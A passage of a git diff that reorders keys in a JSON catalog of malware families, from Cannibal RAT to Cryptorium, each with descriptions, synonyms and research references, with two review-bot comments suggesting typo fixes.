The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable." + "value": "Cannibal Rat" }, { + "description": "", "meta": { - "synonyms": [ - "Anunak" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" - ] + ], + "synonyms": [ + "Anunak" + ], + "type": [] }, "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", - "value": "Carbanak", - "description": "" + "value": "Carbanak" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", - "value": "Carberp", - "description": "" + "value": "Carberp" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", - "value": "Cardinal RAT", - "description": "" + "value": "Cardinal RAT" }, { + "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. 
Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", - "value": "Casper", - "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time." + "value": "Casper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", - "value": "Catchamas", - "description": "" + "value": "Catchamas" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", 
@@ -4337,61 +4339,59 @@ "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", - "value": "CCleaner Backdoor", - "description": "" + "value": "CCleaner Backdoor" }, { + "description": "", "meta": { - "synonyms": [ - "cerebrus" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" - ] + ], + "synonyms": [ + "cerebrus" + ], + "type": [] }, "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", - "value": "CenterPOS", - "description": "" + "value": "CenterPOS" }, { + "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/", "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", - "value": "Cerber", - "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. 
Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information." + "value": "Cerber" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", - "value": "Cerbu", - "description": "" + "value": "Cerbu" }, { + "description": "", "meta": { - "synonyms": [ - "Ham Backdoor" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", 
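Review bot: The Cerber description carried onto the new side still contains a duplicated word, `set of of UDP activity`; since the commit already rewrites that `"description"` line while moving it above `"meta"`, it is the natural place to change it to `set of UDP activity`. The reordering leaves every string value byte-identical, so this would be the only textual change in the hunk. The enclosing `values` array starts and ends outside the hunk.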
@@ -4399,210 +4399,210 @@ "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" - ] + ], + "synonyms": [ + "Ham Backdoor" + ], + "type": [] }, "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", - "value": "ChChes", - "description": "" + "value": "ChChes" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" + ], "synonyms": [ "cherrypickerpos", "cherrypicker", "cherry_picker" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" - ] + "type": [] }, "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", - "value": "CherryPicker POS", - "description": "" + "value": "CherryPicker POS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", - "value": "ChewBacca", - "description": "" + "value": "ChewBacca" }, { + "description": "Adware that shows advertisements using plugin techniques for popular browsers", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"098cfb93-8921-48f0-a694-a83f350e8a61", - "value": "Chinad", - "description": "Adware that shows advertisements using plugin techniques for popular browsers" + "value": "Chinad" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", - "value": "Chir", - "description": "" + "value": "Chir" }, { + "description": "", "meta": { - "synonyms": [ - "AndroKINS" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "https://www.s21sec.com/en/blog/2017/07/androkins/", "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" - ] + ], + "synonyms": [ + "AndroKINS" + ], + "type": [] }, "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", - "value": "Chthonic", - "description": "" + "value": "Chthonic" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", - "value": "Citadel", - "description": "" + "value": "Citadel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" - ] + ], + "synonyms": [], + 
"type": [] }, "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", - "value": "Client Maximus", - "description": "" + "value": "Client Maximus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", "https://www.f-secure.com/weblog/archives/00002822.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", - "value": "Cloud Duke", - "description": "" + "value": "Cloud Duke" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", - "value": "CMSBrute", - "description": "" + "value": "CMSBrute" }, { + "description": "", "meta": { - "synonyms": [ - "meciv" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", "https://twitter.com/ClearskySec/status/963829930776723461", "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties" - ] + ], + "synonyms": [ + "meciv" + ], + "type": [] }, "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", - "value": "CMSTAR", - "description": "" + "value": "CMSTAR" }, { + "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. 
Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", "https://www.lac.co.jp/lacwatch/people/20180521_001638.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", - "value": "Cobalt Strike", - "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable." 
+ "value": "Cobalt Strike" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", - "value": "Cobian RAT", - "description": "" + "value": "Cobian RAT" }, { + "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager.", "meta": { - "synonyms": [ - "COOLPANTS" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", "https://www.group-ib.com/blog/renaissance", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/" - ] + ], + "synonyms": [ + "COOLPANTS" + ], + "type": [] }, "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", - "value": "CobInt", - "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager." + "value": "CobInt" }, { + "description": "", "meta": { - "synonyms": [ - "Carbon" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", 
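Review bot: The CobInt description rewritten on the new side keeps a stray comma after its subject, `CobInt, is a self-developed backdoor of the Cobalt group.`; as the line is touched anyway, `CobInt is a self-developed backdoor of the Cobalt group.` would read cleanly. The rest of the hunk only reorders keys into `description`, `meta` (`refs`, `synonyms`, `type`), `uuid`, `value` and changes no string content. The enclosing `values` array starts and ends outside the hunk.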
@@ -4610,342 +4610,344 @@ "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", "https://github.com/hfiref0x/TDL" - ] + ], + "synonyms": [ + "Carbon" + ], + "type": [] }, "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", - "value": "Cobra Carbon System", - "description": "" + "value": "Cobra Carbon System" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", "https://twitter.com/JaromirHorejsi/status/817311664391524352" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", - "value": "CockBlocker", - "description": "" + "value": "CockBlocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", - "value": "CodeKey", - "description": "" + "value": "CodeKey" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9481d7b1-307c-4504-9333-21720b85317b", - "value": "Cohhoc", - "description": "" + "value": "Cohhoc" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", "https://secrary.com/ReversingMalware/CoinMiner/", "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", - "value": "Coinminer", - 
"description": "" + "value": "Coinminer" }, { + "description": "", "meta": { - "synonyms": [ - "Bandios", - "GrayBird" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", "https://twitter.com/anyrun_app/status/976385355384590337", "https://secrary.com/ReversingMalware/Colony_Bandios/", "https://pastebin.com/GtjBXDmz" - ] + ], + "synonyms": [ + "Bandios", + "GrayBird" + ], + "type": [] }, "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", - "value": "Colony", - "description": "" + "value": "Colony" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", - "value": "Combojack", - "description": "" + "value": "Combojack" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", - "value": "Combos", - "description": "" + "value": "Combos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", - "value": "ComodoSec", - "description": "" + "value": "ComodoSec" }, { + "description": "", "meta": { - "synonyms": [ - "lojack" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", 
"https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research", "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/" - ] + ], + "synonyms": [ + "lojack" + ], + "type": [] }, "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685", - "value": "Computrace", - "description": "" + "value": "Computrace" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", "https://twitter.com/struppigel/status/816926371867926528" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", - "value": "ComradeCircle", - "description": "" + "value": "ComradeCircle" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", - "value": "concealment_troy", - "description": "" + "value": "concealment_troy" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", + "http://contagiodump.blogspot.com/2009/05/win32conficker.html" + ], "synonyms": [ "downadup", "traffic converter" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", - "http://contagiodump.blogspot.com/2009/05/win32conficker.html" - ] + "type": [] }, "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", - "value": "Conficker", - "description": "" + "value": "Conficker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", 
"https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", - "value": "Confucius", - "description": "" + "value": "Confucius" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", - "value": "Contopee", - "description": "" + "value": "Contopee" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", - "value": "CookieBag", - "description": "" + "value": "CookieBag" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "495377c4-1be5-4c65-ba66-94c221061415", - "value": "Corebot", - "description": "" + "value": "Corebot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", 
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://malware.prevenity.com/2014/08/malware-info.html", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", - "value": "Coreshell", - "description": "" + "value": "Coreshell" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", - "value": "CradleCore", - "description": "" + "value": "CradleCore" }, { + "description": "", "meta": { - "synonyms": [ - "Crash", - "Industroyer" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" - ] + ], + "synonyms": [ + "Crash", + "Industroyer" + ], + "type": [] }, "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", - "value": "CrashOverride", - "description": "" + "value": "CrashOverride" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", - "value": "Credraptor", - "description": "" + "value": "Credraptor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", - "value": "Crenufs", - "description": "" + "value": "Crenufs" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", - "value": "Crimson", - "description": "" + "value": "Crimson" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", - "value": "Crisis", - "description": "" + "value": "Crisis" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", "https://hackmag.com/security/ransomware-russian-style/", 
@@ -4953,326 +4955,326 @@ "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", "https://twitter.com/demonslay335/status/971164798376468481" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", - "value": "Cryakl", - "description": "" + "value": "Cryakl" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", - "value": "CryLocker", - "description": "" + "value": "CryLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", - "value": "CrypMic", - "description": "" + "value": "CrypMic" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", - "value": "Crypt0l0cker", - "description": "" + "value": "Crypt0l0cker" }, { + "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. 
To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", "https://www.secureworks.com/research/cryptolocker-ransomware", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", - "value": "CryptoLocker", - "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins." + "value": "CryptoLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", - "value": "CryptoLuck", - "description": "" + "value": "CryptoLuck" }, { + "description": "", "meta": { - "synonyms": [ - "CryptFile2" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/", "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/" - ] + ], + "synonyms": [ + "CryptFile2" + ], + "type": [] }, "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", - "value": "CryptoMix", - "description": "" + "value": "CryptoMix" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", 
